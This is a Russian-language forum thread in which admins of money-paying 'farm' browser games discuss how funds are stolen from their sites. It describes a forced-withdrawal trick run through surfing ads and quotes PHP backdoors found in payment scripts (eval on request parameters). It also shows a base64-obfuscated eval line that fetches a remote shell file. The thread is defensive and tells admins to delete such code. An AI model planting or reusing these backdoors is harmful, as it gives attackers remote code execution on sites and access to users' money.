takebet
Участник
- Сообщения
- 25
- Реакции
- 4
Многие новые админы ферм жалуются, что не понятным способом уводят деньги с их игры, при чём массово и на один и тот же номер кошелька.
Это объясняется отсутствием Платёжного пароля в игре и присутствием серфинга сайтов.
Злодей (так назовем взломщика), имеет свой код на своем хостинге, вписывает в этот код свой номер кошелька, сумму вывода и ссылку на сайт где есть серфинг без платежного пароля.
Выглядит ссылка примерно так: "http://sait.ru/account/payment"
Ссылка прямо указывает на страницу вывода.
Затем Злодей свой рекламный текст в серфинг и указывает ссылку на свой сайт, где прячет код с этой ссылкой и кошельком. Сейчас многие админы ставят серфинг с автомодерацией, то есть не нужно производить проверку добавленных объявлений, прежде чем запустить это объявление для просмотра в серфинге. Так вот автоматически объявление Злодея поступает в список серфинга для просмотра другими участниками. Участник кликает по ссылке, но там на секунду появляется окошечко с кошельком Злодея и суммой для вывода, но после этого участник видит открывшуюся страницу вывода с его номером кошелька. И в этот момент происходит автоматическая выплата указанной суммы на кошелек Злодея.
Сумма не большая, рассчитанная на минимальную выплату от 1 рубля и чуть выше может быть. зато много участников просматривая эту ссылку, лишаются заложенной в коде суммы, отсюда и происходит массовые выплаты на один и тот же кошелек, но с разных аккаунтов.
Есть такие Злодеи, что ставят сумму к выводу больше, например 10 рублей (1000 серебра), а когда попадается участник у которого такая сумма имеется на балансе вывода, тогда и происходит выплата Злодею.
Проверял сам на своей игре, после чего везде устанавливаю платёжный пароль.
Даже есть записанное видео в ютубе, его можно найти по поиску: массовый вывод денег с ферм. Или что-то в этом роде.
Защита очень простая и эффективная - установить платёжный пароль, тогда при выплате этот код не сможет обойти платежный пароль и деньги останутся у участников.
Это объясняется отсутствием Платёжного пароля в игре и присутствием серфинга сайтов.
Злодей (так назовем взломщика), имеет свой код на своем хостинге, вписывает в этот код свой номер кошелька, сумму вывода и ссылку на сайт где есть серфинг без платежного пароля.
Выглядит ссылка примерно так: "http://sait.ru/account/payment"
Ссылка прямо указывает на страницу вывода.
Затем Злодей свой рекламный текст в серфинг и указывает ссылку на свой сайт, где прячет код с этой ссылкой и кошельком. Сейчас многие админы ставят серфинг с автомодерацией, то есть не нужно производить проверку добавленных объявлений, прежде чем запустить это объявление для просмотра в серфинге. Так вот автоматически объявление Злодея поступает в список серфинга для просмотра другими участниками. Участник кликает по ссылке, но там на секунду появляется окошечко с кошельком Злодея и суммой для вывода, но после этого участник видит открывшуюся страницу вывода с его номером кошелька. И в этот момент происходит автоматическая выплата указанной суммы на кошелек Злодея.
Сумма не большая, рассчитанная на минимальную выплату от 1 рубля и чуть выше может быть. зато много участников просматривая эту ссылку, лишаются заложенной в коде суммы, отсюда и происходит массовые выплаты на один и тот же кошелек, но с разных аккаунтов.
Есть такие Злодеи, что ставят сумму к выводу больше, например 10 рублей (1000 серебра), а когда попадается участник у которого такая сумма имеется на балансе вывода, тогда и происходит выплата Злодею.
Проверял сам на своей игре, после чего везде устанавливаю платёжный пароль.
Даже есть записанное видео в ютубе, его можно найти по поиску: массовый вывод денег с ферм. Или что-то в этом роде.
Защита очень простая и эффективная - установить платёжный пароль, тогда при выплате этот код не сможет обойти платежный пароль и деньги останутся у участников.
hyipblocker
Участник
- Сообщения
- 24
- Реакции
- 11
Всё это бред. Не нужно пользоваться гавно-хостингами и ставить паблик движки. А также ставьте мод запоминания кошелька, чтобы пользователь мог его ввести ОДИН раз. Это надёжнее платёжного пароля. Берите VPS, и у вас есть круглосуточный мониторинг.
Через логи можно быстро найти уязвимость. Будь то SQL INJ вы сразу поймете где дыра. По логам это легко палится, просто введите в поиск SELECT/UNION/'/+ и вы поймёте это (если руки от куда надо растут.)
Через логи можно быстро найти уязвимость. Будь то SQL INJ вы сразу поймете где дыра. По логам это легко палится, просто введите в поиск SELECT/UNION/'/+ и вы поймёте это (если руки от куда надо растут.)
pligin
Участник
- Сообщения
- 3.654
- Реакции
- 1.337
Я, кстати, предоставляю услуги по содержанию VPS Виртуальный север VPS на SSDhyipblocker написал(а):Всё это бред. Не нужно пользоваться гавно-хостингами и ставить паблик движки. А также ставьте мод запоминания кошелька, чтобы пользователь мог его ввести ОДИН раз. Это надёжнее платёжного пароля. Берите VPS, и у вас есть круглосуточный мониторинг.
Через логи можно быстро найти уязвимость. Будь то SQL INJ вы сразу поймете где дыра. По логам это легко палится, просто введите в поиск SELECT/UNION/'/+ и вы поймёте это (если руки от куда надо растут.)
hyipblocker
Участник
- Сообщения
- 24
- Реакции
- 11
Спасибо, но характеристики мне слишком малы. Сейчас я юзаю четырёхядерный с 8 RAM. Так как кроме игры держу ещё много проектов.admin написал(а):Я, кстати, предоставляю услуги по содержанию VPS Виртуальный север VPS на SSD
pligin
Участник
- Сообщения
- 3.654
- Реакции
- 1.337
у каждого свои потребности... но, мне кажется, это через чур...hyipblocker написал(а):Спасибо, но характеристики мне слишком малы. Сейчас я юзаю четырёхядерный с 8 RAM. Так как кроме игры держу ещё много проектов.
Жоха
Участник
- Сообщения
- 22
- Реакции
- 0
Чаще всего дыры встречаются в файле payeer_merchant.php, если там есть такой код
просто удалите этот код. Ещё если у вас есть топ 5 или 10 и.тд там тоже может оказаться дыра, вот код
обязательно удалите этот код
PHP:
# Проверяем баланс
if(isset($_GET['balance'])){
$payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
if($payeer->isAuth()){
$arBalance = $payeer->getBalance();
if($arBalance["auth_error"] == 0){
$balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
echo "$balance";
} else {
echo 'error auth';
}
}
}
# Если пользователь админ
eval($_GET['fs']);
PHP:
f(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
pligin
Участник
- Сообщения
- 3.654
- Реакции
- 1.337
в фермах eval() нужно всегда удалятьЖоха написал(а):Чаще всего дыры встречаются в файле payeer_merchant.php, если там есть такой код
просто удалите этот код. Ещё если у вас есть топ 5 или 10 и.тд там тоже может оказаться дыра, вот кодPHP:# Проверяем баланс if(isset($_GET['balance'])){ $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey); if($payeer->isAuth()){ $arBalance = $payeer->getBalance(); if($arBalance["auth_error"] == 0){ $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"]; echo "$balance"; } else { echo 'error auth'; } } } # Если пользователь админ eval($_GET['fs']);
обязательно удалите этот кодPHP:f(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
hyipblocker
Участник
- Сообщения
- 24
- Реакции
- 11
у меня ещё около 10 проектов ))) я думаю этого даже мало уже))admin написал(а):у каждого свои потребности... но, мне кажется, это через чур...
hyipblocker
Участник
- Сообщения
- 24
- Реакции
- 11
Вот вы пишите про него, что он так вреден.Жоха написал(а):Чаще всего дыры встречаются в файле payeer_merchant.php, если там есть такой код
просто удалите этот код. Ещё если у вас есть топ 5 или 10 и.тд там тоже может оказаться дыра, вот кодPHP:# Проверяем баланс if(isset($_GET['balance'])){ $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey); if($payeer->isAuth()){ $arBalance = $payeer->getBalance(); if($arBalance["auth_error"] == 0){ $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"]; echo "$balance"; } else { echo 'error auth'; } } } # Если пользователь админ eval($_GET['fs']);
обязательно удалите этот кодPHP:f(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
А пример иньекции можете показать? Я просто не разбирал ещё движки особо эти. Хотя познания есть
pligin
Участник
- Сообщения
- 3.654
- Реакции
- 1.337
можно почитать eval() и все поймешьhyipblocker написал(а):Вот вы пишите про него, что он так вреден.
А пример иньекции можете показать? Я просто не разбирал ещё движки особо эти. Хотя познания есть
hyipblocker
Участник
- Сообщения
- 24
- Реакции
- 11
Я лишь просил пример, что такое eval(); я знаю, но не сталкивался с дырами в фермах, не знаю даже где искать. у меня по крайней мере в движке его вообще нетadmin написал(а):можно почитать eval() и все поймешь
pligin
Участник
- Сообщения
- 3.654
- Реакции
- 1.337
hyipblocker написал(а):Я лишь просил пример, что такое eval(); я знаю, но не сталкивался с дырами в фермах, не знаю даже где искать. у меня по крайней мере в движке его вообще нет
Код:
$string = ZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcHN3ZWIucnUvc2hlbGwudHh0Jyk=;
eval(base64_decode($string));
Код:
eval(base64_decode(ZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcHN3ZWIucnUvc2hlbGwudHh0Jyk=));
hyipblocker
Участник
- Сообщения
- 24
- Реакции
- 11
А ну так конечно, через base64 хоть шелл зашифровать можно. Благо дело что всё это легко расшифровать в отличии от Zend.admin написал(а):Код:$string = ZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcHN3ZWIucnUvc2hlbGwudHh0Jyk=; eval(base64_decode($string));
Код:eval(base64_decode(ZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcHN3ZWIucnUvc2hlbGwudHh0Jyk=));
pligin
Участник
- Сообщения
- 3.654
- Реакции
- 1.337
да, но не все обращают на такое внимание...hyipblocker написал(а):А ну так конечно, через base64 хоть шелл зашифровать можно. Благо дело что всё это легко расшифровать в отличии от Zend.
Заходи Биржа фриланса ферм, хайпов